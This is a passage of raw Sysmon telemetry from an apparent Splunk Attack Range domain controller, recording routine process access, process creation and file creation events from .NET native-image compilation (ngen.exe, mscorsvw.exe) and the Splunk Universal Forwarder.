13:20:20.205{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4514-6000-5401-000000009A01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.205{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4514-6000-5401-000000009A01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.206{08A6967A-4514-6000-5401-000000009A01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.189{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4514-6000-5301-000000009A01}4460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.189{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4514-6000-5301-000000009A01}4460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.189{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4514-6000-5301-000000009A01}4460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:20.080{08A6967A-4512-6000-5101-000000009A01}3460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d84-0\Microsoft.VisualBasic.dll2021-01-14 13:20:20.080 10341000x80000000000000005509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:21.924{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4515-6000-5901-000000009A01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:21.908{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4515-6000-5901-000000009A01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:21.908{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4515-6000-5901-000000009A01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:21.845{08A6967A-4515-6000-5801-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4cc-0\System.Transactions.dll2021-01-14 13:20:21.845 10341000x80000000000000005505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:21.314{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4515-6000-5801-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:21.298{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4515-6000-5801-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:21.298{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4515-6000-5801-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:21.252{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4515-6000-5701-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:21.236{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4515-6000-5701-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:21.236{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4515-6000-5701-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:21.158{08A6967A-4514-6000-5601-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1378-0\System.DirectoryServices.dll2021-01-14 13:20:21.158 10341000x80000000000000005512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:22.142{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4516-6000-5A01-000000009A01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:22.142{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4516-6000-5A01-000000009A01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:22.142{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4516-6000-5A01-000000009A01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.892{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4517-6000-5E01-000000009A01}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.892{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4517-6000-5E01-000000009A01}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.892{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4517-6000-5E01-000000009A01}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.814{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4517-6000-5D01-000000009A01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.799{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4517-6000-5D01-000000009A01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.799{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4517-6000-5D01-000000009A01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:23.736{08A6967A-4517-6000-5C01-000000009A01}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d28-0\CustomMarshalers.dll2021-01-14 13:20:23.736 10341000x80000000000000005520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 